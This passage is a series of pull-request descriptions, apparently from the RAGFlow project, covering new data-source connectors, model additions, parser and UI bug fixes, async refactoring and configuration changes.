### What problem does this PR solve?
Add metadata from moodle data source.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Make RAGFlow more asynchronous 2. #11551, #11579, #11619.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
- [x] Refactoring
- [x] Performance Improvement
### What problem does this PR solve?
Feat: add mineru auto installer
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Delete useless request hooks. #10427
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Original rag/nlp/rag_tokenizer.py is put to Infinity and infinity-sdk
via https://github.com/infiniflow/infinity/pull/3117 .
Import rag_tokenizer from infinity and inherit from
rag_tokenizer.RagTokenizer in new rag/nlp/rag_tokenizer.py.
- Bump infinity to 0.6.8
### Type of change
- [x] Refactoring
### What problem does this PR solve?
Add MiniMax-M2 and remove deprecated models.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
- [x] Refactoring
### What problem does this PR solve?
Feat: Remove unnecessary dialogue-related code. #10427
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
change:
new api /sequence2txt,
update QWenSeq2txt and ZhipuSeq2txt
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Files uploaded via the dialog box can be uploaded without binding
to a dataset. #9590
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: jina embedding issue #11614
Feat: Add jina embedding v4
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Try to make this more asynchronous. Verified in chat and agent
scenarios, reducing blocking behavior. #11551, #11579.
However, the impact of these changes still requires further
investigation to ensure everything works as expected.
### Type of change
- [x] Refactoring
### What problem does this PR solve?
Add fallbacks for MinerU output path. #11613, #11620.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Quart framework has default RESPONSE_TIMEOUT and BODY_TIMEOUT of 60
seconds.
This causes the frontend chat to hang exactly after 60 seconds when
using
slow LLM backends (e.g., Ollama on CPU, or remote APIs with high
latency).
This fix adds configurable timeout settings via environment variables
with
sensible defaults (600 seconds = 10 minutes) to match other timeout
configurations in RAGFlow.
Fixes issues with chat timeout when:
- Using local Ollama on CPU (response time ~2 minutes)
- Using remote LLM APIs with high latency
- Processing complex RAG queries with many chunks
### Type of change
- [X] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: Grzegorz Sterniczuk <grzegorz@sternicz.uk>
### What problem does this PR solve?
Support for Redis 6+ ACL authentication (username)
close#11606
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
- [x] Documentation Update
### What problem does this PR solve?
This PR closing feature request #11286.
It implements ability to choose the background theme of the _Full screen
chat_ which is Embed into webpage.
Looks like that:
<img width="501" height="349" alt="image"
src="https://github.com/user-attachments/assets/e5fdfb14-9ed9-43bb-a40d-4b580985b9d4"
/>
It works similar to `Locale`, using url parameter to set the theme.
if the parameter is invalid then is using the default theme.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
---------
Co-authored-by: Your Name <you@example.com>
### What problem does this PR solve?
Feat: create datasets from http api supports ingestion pipeline
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Error 102 "Can't find dialog by ID" when embedding agent with
from=agent** #11552
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Replace antd in the chat message with shadcn. #10427
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
When using the 'metadata_condition' for metadata filtering, if no
documents match the filtering criteria, the system will return the
search results of all documents instead of returning an empty result.
When the metadata_condition has conditions but no matching documents,
simply return an empty result.
#11572
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: Chenguang Wang <chenguangwang@deepglint.com>
### What problem does this PR solve?
Fix: Added styles for empty states on the page.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
optimize meta filter generation for better structure handling
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: doc_aggs not correctly returned when no chunks retrieved.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Add GPT-5.1, GPT‑5.1 Instant and Claude-Opus-4.5. #11548
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
change:
remove garbage filtering rules
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Delete useless knowledge base, chat, and search files. #10427
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
issue:
[#11541](https://github.com/infiniflow/ragflow/issues/11541)
change:
enable structured output for agent with tool
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Add loop operator node. #10427
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
issue:
#10427
change:
new component Loop
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
To solve the problem of error reporting caused by type errors when
various types of exception returns are triggered
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
##### Problem Description
When parsing HTML files, some page content may be lost.
For example, text inside nested `<font>` tags within multiple `<div>`
elements (e.g.,
`<div><font>Text_1</font></div><div><font>Text_2</font></div>`) fails to
be preserved correctly.
###### Root Cause #1: Block ID propagation is interrupted
1. **Block ID generation**: When the parser encounters a `<div>`, it
generates a new `block_id` because `<div>` belongs to `BLOCK_TAGS`.
2. **Recursive processing**: This `block_id` is passed down recursively
to process the `<div>`’s child nodes.
3. **Interruption occurs**: When processing a child `<font>` tag, the
code enters the `else` branch of `read_text_recursively` (since `<font>`
is a Tag).
4. **Bug location**: The first line in this `else` branch explicitly
sets **`block_id = None`**.
- This discards the valid `block_id` inherited from the parent `<div>`.
- Since `<font>` is not in `BLOCK_TAGS`, it does not generate a new
`block_id`, so it passes `None` to its child text nodes.
5. **Consequence**: The extracted text nodes have an empty `block_id` in
their `metadata`. During the subsequent `merge_block_text` step, these
texts cannot be correctly associated with their original `<div>` block
due to the missing ID. As a result, all text from `<font>` tags gets
merged together, which then triggers a second issue during
concatenation.
6. **Solution:** Remove the forced reset of `block_id` to `None`. When
the current tag (e.g., `<font>`) is not a block-level element, it should
inherit the `block_id` passed down from its parent. This ensures
consistent ownership across the hierarchy: `div` → `font` → `text`.
###### Root Cause #2: Data loss during text concatenation
1. The line `current_content += (" " if current_content else "" +
content)` has a misplaced parenthesis. When `current_content` is
non-empty (`True`):
- The ternary expression evaluates to `" "` (a single space).
- The code executes `current_content += " "`.
- **Result**: Only a space is appended—**the new `content` string is
completely discarded**.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
- Update sync data source to handle metadata properly
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Fix: Refactoring and enhancing the functionality of the delete
confirmation dialog component
- Refactoring and enhancing the functionality of the delete confirmation
dialog component
- Modifying the style of the user center
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
This PR adds webdav storage as data source for data sync service.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### Type of change
* [x] New Feature (non-breaking change which adds functionality)
Add support for Virtual Hosted Style and Path Style URL addressing in
S3_COMPATIBLE storage connector. Default to Virtual Hosted Style for
better compatibility with COS and other S3-compatible services.
- Add addressing_style field to credentials (virtual/path)
- Update frontend form with selection dropdown
- Add validation and tooltips for S3 Compatible endpoint URL
<img width="703" height="875" alt="image"
src="https://github.com/user-attachments/assets/af5ba7ca-f160-47fa-8ba1-32eace8f5fdf"
/>
<img width="1620" height="788" alt="image"
src="https://github.com/user-attachments/assets/6012b5ce-8bcb-478e-a9cb-425f886d5046"
/>
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Feat: support operator in/not in for metadata filter. #11376#11378
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Modify the style of your personal center
Add resizable component
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: After saving the model parameters of the chat page, the parameter
disappears. #11500
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
New options for rag server scripts to create the super admin user when
start server.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
---------
Co-authored-by: Zhichang Yu <yuzhichang@gmail.com>
Co-authored-by: Jin Hai <haijin.chn@gmail.com>
### What problem does this PR solve?
Fix: coroutine object has no attribute get
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix:Modify the personal center style #10703
- All form-label font styles are no longer bold
- Menus are not highlighted on first visit to the personal center
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### Description
This PR fixes a bug where Nginx fails to start when using the
`ragflow.https.conf` configuration. The upstream host `ragflow` was not
resolving correctly inside the container context, causing an `[emerg]
host not found` error.
### Changes
- Updated `docker/nginx/ragflow.https.conf`: Changed upstream host from
`ragflow` to `localhost` for both the admin API and the main API.
### Related Issue
Fixes#11453
### Testing
- [x] Enabled HTTPS config in Docker.
- [x] Verified Nginx starts successfully without "host not found"
errors.
- [x] Verified API accessibility.
### What problem does this PR solve?
This PR adds a native Moodle connector to sync content (courses,
resources, forums, assignments, pages, books) into RAGFlow.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Add auth header for Ollama chat model. #11350
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix:Resolves the issue of sessions not being saved when the variable is
array<object>.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Enable logical operators in metadata. #11387#11376
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Ignore chunk size when using custom delimiter.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
- Add whitespace validation to the PDF English text checking regex
- Reduce false negatives in English PDF content recognition
### What problem does this PR solve?
The core idea is to **expand the regex content used for English text
detection** so it can accommodate more valid characters commonly found
in English PDFs. The modifications include:
- Adding support for **space** in the regex.
- Ensuring the update does not reduce existing detection accuracy.
### Type of change
- [✅] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: UI adjustments, replacing private components with public components
- UI adjustments for public components (input, multiselect,
SliderInputFormField)
- Replacing the private LlmSettingFieldItems component in search with
the public LlmSettingFieldItems component
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Add a loop variable to the loop operator. #10427
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Adjust <Input> component a suitable horizontal padding when have
prefix or suffix icon
- Slightly change visual effect of <ThemeSwitch> in admin UI
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Modify the style of the user center
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
FIx: missing parameters in by_plaintext method for PDF naive mode
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: lih <dev_lih@139.com>
### What problem does this PR solve?
Enriches rich text (links, mentions, equations), flags to-do blocks with
[x]/[ ], captures block-level equations, builds table HTML, downloads
attachments.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: add more chunking method #11311
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
change:
improve multi-column document detection
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Outputs data is directly synchronized to the canvas without going
through the form. #10427
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Incorrect retrieval total count with pagination enabled.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: incorrect parameter usage #8084
Fix: Optimize edge check #10851
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
issue:
#11293
change:
RagFlow not starting with Postgres DB
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Use array syntax in order to prevent parameter quoting issues. This also
runs the command directly without a bash process, which means signals
(like SIGTERM) will be delivered directly to the server process.
Fixes issue #11390
### What problem does this PR solve?
`${REDIS_PASSWORD}` was not passed correctly, meaning if it was unset or
contains spaces (or shell code!) it was interpreted wrongly.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Resolve the issue of missing thinking labels when viewing pre-existing
conversations
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
### Type of change
- [x] Documentation Update
- [x] Other (please describe):
### What problem does this PR solve?
- Added TCADP Parser configuration fields to PDF, PPT, and spreadsheet
parsing forms
- Implemented support for setting table result type (Markdown/HTML) and
Markdown image response type (URL/Text)
- Updated TCADP Parser to handle return format settings from
configuration or parameters
- Enhanced frontend to dynamically show TCADP options based on selected
parsing method
- Modified backend to pass format parameters when calling TCADP API
- Optimized form default value logic for TCADP configuration items
- Updated multilingual resource files for new configuration options
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fixes#10933
This PR fixes a `TypeError` in the Gemini model provider where the
`total_token_count_from_response()` function could receive a `None`
response object, causing the error:
TypeError: argument of type 'NoneType' is not iterable
**Root Cause:**
The function attempted to use the `in` operator to check dictionary keys
(lines 48, 54, 60) without first validating that `resp` was not `None`.
When Gemini's `chat_streamly()` method returns `None`, this triggers the
error.
**Solution:**
1. Added a null check at the beginning of the function to return `0` if
`resp is None`
2. Added `isinstance(resp, dict)` checks before all `in` operations to
ensure type safety
3. This defensive programming approach prevents the TypeError while
maintaining backward compatibility
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### Changes Made
**File:** `rag/utils/__init__.py`
- Line 36-38: Added `if resp is None: return 0` check
- Line 52: Added `isinstance(resp, dict)` before `'usage' in resp`
- Line 58: Added `isinstance(resp, dict)` before `'usage' in resp`
- Line 64: Added `isinstance(resp, dict)` before `'meta' in resp`
### Testing
- [x] Code compiles without errors
- [x] Follows existing code style and conventions
- [x] Change is minimal and focused on the specific issue
### Additional Notes
This fix ensures robust handling of various response types from LLM
providers, particularly Gemini, w
---------
Signed-off-by: Zhang Zhefang <zhangzhefang@example.com>
### What problem does this PR solve?
Add OceanBase doc engine. Close#5350
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
**Cohere rerank base_url default handling**
- Background: When no rerank base URL is configured, the settings
pipeline was passing an empty string through RERANK_CFG →
TenantLLMService → CoHereRerank, so the Cohere client received
base_url="" and produced “missing protocol” errors during rerank calls.
- What changed: The CoHereRerank constructor now only forwards base_url
to the Cohere client when it isn’t empty/whitespace, causing the client
to fall back to its default API endpoint otherwise.
- Why it matters: This prevents invalid URL construction in the rerank
workflow and keeps tests/sanity checks that rely on the default Cohere
endpoint from failing when no custom base URL is specified.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: Philipp Heyken Soares <philipp.heyken-soares@am.ai>
### What problem does this PR solve?
Feat: Fixed an issue where modifying fields in the agent operator caused
the loss of structured data. #10427
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Users currently can’t view `git checkout v0.22.1` directly. They need to
scroll the code block all the way to the right to see it.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: If a query variable in a data manipulation operator is deleted, a
warning message should be displayed to the user. #10427#11255
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: The key for the begin operator can only contain alphanumeric
characters and underscores. #10427
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Structured data will still be stored in outputs for compatibility
with older versions. #10427
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Set the outputs type of list operation. #10427
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: bbox not included in mineru output #11315
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Add Gemini 3 Pro preview.
Change `GenerativeModel` to `genai`.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
One loop to get better performance
### Type of change
- [x] Refactoring
Signed-off-by: Jin Hai <haijin.chn@gmail.com>
### What problem does this PR solve?
Fix: Fixed an issue where variable aggregation operators could not be
connected to other operators. #10427
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
As title
### Type of change
- [x] Other (please describe): Update version info
Signed-off-by: Jin Hai <haijin.chn@gmail.com>
### What problem does this PR solve?
Feat: Display variables in the variable assignment node. #10427
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
issue:
https://github.com/infiniflow/ragflow/issues/10427
change:
new component variable assigner
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Add a switch to control the display of structured output to the
agent form. #10427
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
No results can be found through the API /api/v1/dify/retrieval. #11307
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
issue:
[#11319](https://github.com/infiniflow/ragflow/issues/11319)
change:
limit random sampling range in check_embedding
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: manual parser with mineru #11320
Fix: missing parameter in mineru #11334
Fix: add outlines parameter for pdf parsers
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: add describe_image_with_prompt for ZHIPU AI #11289
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Fixed the issue where form data assigned by variables was not
updated in real time. #10427
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
There's a typo in `entrypoint.sh` on line 74: the case statement uses
`--disable-datasyn)` (missing the 'c'), while the usage function and
documentation correctly show `--disable-datasync` (with the 'c'). This
mismatch causes the `--disable-datasync` flag to be unrecognized,
triggering the usage message and causing containers to restart in a loop
when this flag is used.
**Background:**
- Users following the documentation use `--disable-datasync` in their
docker-compose.yml
- The entrypoint script doesn't recognize this flag due to the typo
- The script calls `usage()` and exits, causing Docker containers to
restart continuously
- This makes it impossible to disable the data sync service as intended
**Example scenario:**
When a user adds `--disable-datasync` to their docker-compose command
(as shown in examples), the container fails to start properly because
the argument isn't recognized.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### Proposed Solution
Fix the typo on line 74 of `entrypoint.sh` by changing:
```bash
--disable-datasyn)
```
to:
```bash
--disable-datasync)
```
This matches the spelling used in the usage function (line 9 and 13) and
allows the flag to work as documented.
### Changes Made
- Fixed typo in `entrypoint.sh` line 74: changed `--disable-datasyn)` to
`--disable-datasync)`
- This ensures the argument matches the documented flag name and usage
function
---
**Code change:**
```bash
# Line 74 in entrypoint.sh
# Before:
--disable-datasyn)
ENABLE_DATASYNC=0
shift
;;
# After:
--disable-datasync)
ENABLE_DATASYNC=0
shift
;;
```
This is a simple one-character fix that resolves the argument parsing
issue.
### What problem does this PR solve?
change:
update check_embedding failed info
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
PR for implementing s3 compatible storage units #11240
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Fixed an issue where adding session variables multiple times would
overwrite them.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
Co-authored-by: Jason <ggbbddjm@gmail.com>
### What problem does this PR solve?
Feat: Construct a dynamic variable assignment form #10427
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: concat images in word document. Partially solved issues in #11063
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: create dataset return type inconsistent #11167
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fixes an issue where default models which used the same factory but
different base URLs would all be initialised with the default chat
model's base URL and would ignore e.g. the embedding model's base URL
config.
For example, with the following service config, the embedding and
reranker models would end up using the base URL for the default chat
model (i.e. `llm1.example.com`):
```yaml
ragflow:
service_conf:
user_default_llm:
factory: OpenAI-API-Compatible
api_key: not-used
default_models:
chat_model:
name: llm1
base_url: https://llm1.example.com/v1
embedding_model:
name: llm2
base_url: https://llm2.example.com/v1
rerank_model:
name: llm3
base_url: https://llm3.example.com/v1/rerank
llm_factories:
factory_llm_infos:
- name: OpenAI-API-Compatible
logo: ""
tags: "LLM,TEXT EMBEDDING,SPEECH2TEXT,MODERATION"
status: "1"
llm:
- llm_name: llm1
base_url: 'https://llm1.example.com/v1'
api_key: not-used
tags: "LLM,CHAT,IMAGE2TEXT"
max_tokens: 100000
model_type: chat
is_tools: false
- llm_name: llm2
base_url: https://llm2.example.com/v1
api_key: not-used
tags: "TEXT EMBEDDING"
max_tokens: 10000
model_type: embedding
- llm_name: llm3
base_url: https://llm3.example.com/v1/rerank
api_key: not-used
tags: "RERANK,1k"
max_tokens: 10000
model_type: rerank
```
### Type of change
- [X] Bug Fix (non-breaking change which fixes an issue)
… user center.
### What problem does this PR solve?
Fix: Fixed the issue of not being able to select the time zone in the
user center.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
1. remove redundant code
2. fix miner performance issue
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] Refactoring
Signed-off-by: Jin Hai <haijin.chn@gmail.com>
### What problem does this PR solve?
Doc: add default username & pwd
### Type of change
- [x] Documentation Update
---------
Co-authored-by: writinwaters <93570324+writinwaters@users.noreply.github.com>
### What problem does this PR solve?
Feat: extract message output to file
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
pr:
#11276
change:
ListOperations does not support sorting arrays of objects.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Added the ability to download files in the agent message reply
function.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
issue:
https://github.com/infiniflow/ragflow/issues/10427
change:
new component list operations
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Correctly check task executor alive and display status.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Remove legacy accounts and passwords.
### What problem does this PR solve?
Remove leftover account and password in
agent/templates/sql_assistant.json
### Type of change
- [x] Other (please describe):
### What problem does this PR solve?
Fixes: Added session variable types and modified configuration
- Added more types of session variables
- Modified the embedding model switching logic in the knowledge base
configuration
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
As title
### Type of change
- [x] Refactoring
Signed-off-by: Jin Hai <haijin.chn@gmail.com>
Co-authored-by: Zhichang Yu <yuzhichang@gmail.com>
### What problem does this PR solve?
pr:
#10854
change:
update check_embedding api
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add fault-tolerant mechanism to RAPTOR.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix some IDE warnings
### Type of change
- [x] Refactoring
---------
Signed-off-by: Jin Hai <haijin.chn@gmail.com>
### What problem does this PR solve?
- Updated tests to reflect new behavior of handling duplicate dataset
names
- Instead of returning an error, the system now appends "(1)" to
duplicate names
- This problem was introduced by PR #10960
### Type of change
- [x] Testcase update
### What problem does this PR solve?
issue:
[#11195](https://github.com/infiniflow/ragflow/issues/11195)
change:
support API for generating knowledge graph and raptor
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
- [x] Documentation Update
### What problem does this PR solve?
Add the specified parent_path to the document upload api interface
(#11230)
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
Co-authored-by: virgilwong <hyhvirgil@gmail.com>
### What problem does this PR solve?
Fix: Profile picture cropping supported
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
change:
“After each dialogue turn, the agent component’s output is not reset.”
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
- Update version tags in README files (including translations) from
v0.21.1 to v0.22.0
- Modify Docker image references and documentation to reflect new
version
- Update version badges and image descriptions
- Maintain consistency across all language variants of README files
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
Fix: Bug Fixes#10703
- Fixed the menu order in the user center
- Added a disabled RAPTOR scope
- Fixed some style issues
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
RAGFlow will no longer offer docker images that contains embedding
models.
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
Fixes: Fixed some bugs #10703
- Removed login page animation
- Modified some styles in the user profile center
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Fixed an issue that caused the page to crash when a knowledge base
variable was selected. #10427
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
GraphRAG and RAPTOR tasks do not affect document status.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
[Update LLM factory ranks in llm_factories.json]
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Confluence cannot retrieve updated files。
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fixes: Fixed some bugs #10703
- Removed S3 upload from the file upload component
- Updated the dropdown menu style on the model provider page
- Updated some model provider icons
- Fixed other style issues
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Update env to support PPTX
Fix: update README for version changes #11138
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] Documentation Update
---------
Co-authored-by: writinwaters <93570324+writinwaters@users.noreply.github.com>
### What problem does this PR solve?
Feat: The input parameters of data manipulation operators can only be of
type object. #10427
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add mechanism to check cancellation in Agent.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Place the new mcp button at the end of the line. #10427
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
#10056
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fixes: Fixed model provider issues and improved some features
- Removed the old login page
- Updated model provider icons
- Added RAPTOR modification range parameter
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Call the interface to stop the output of the large model #10997
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Add task executor bar chart
- Add read version string
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
change:
1. update agent variable name rule.
2. reset() in Canvas doesn't reset the env var.
3. correct log input binding in message component
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fixes: Bugs fixed
- Removed invalid code,
- Modified the user center style,
- Added an automatic data source parsing switch.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Added vendor ranking so that frequently used model providers appear
higher on the page for easier access.
Remove deprecated LLM configurations from llm_factories.json to
streamline model management
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Adjust the style of mcp and checkbox. #10427
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
fix infinity "INSERT: Column raptor_kwd not found in table" error
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Optimize Prompts and Regex for use_sql() #11127
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Globally defined conversation variables can be selected in the
operator's query variables. #10427
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
issue:
#11136
change:
not enough values to unpack (expected 3, got 2) in general chunk
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: remove unsupported models in siliconflow api
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: missing file formats in hierarchical_manager #11084
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: The keys for data manipulation operators can only be numbers,
letters, and underscores. #10427
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feature: Added global variable functionality
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
For proper semantics Layout should use HTML `<main>` element to wrap the
Header and Outlet which produce`<section>` HTML elements.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
- Modify and adjust styles (CSS vars, components) to match the design
system
- Adjust file and directory structure of admin UI
### Type of change
- [x] Refactoring
### What problem does this PR solve?
Add kimi-k2-thinking and moonshot-v1-vision-preview.
### Type of change
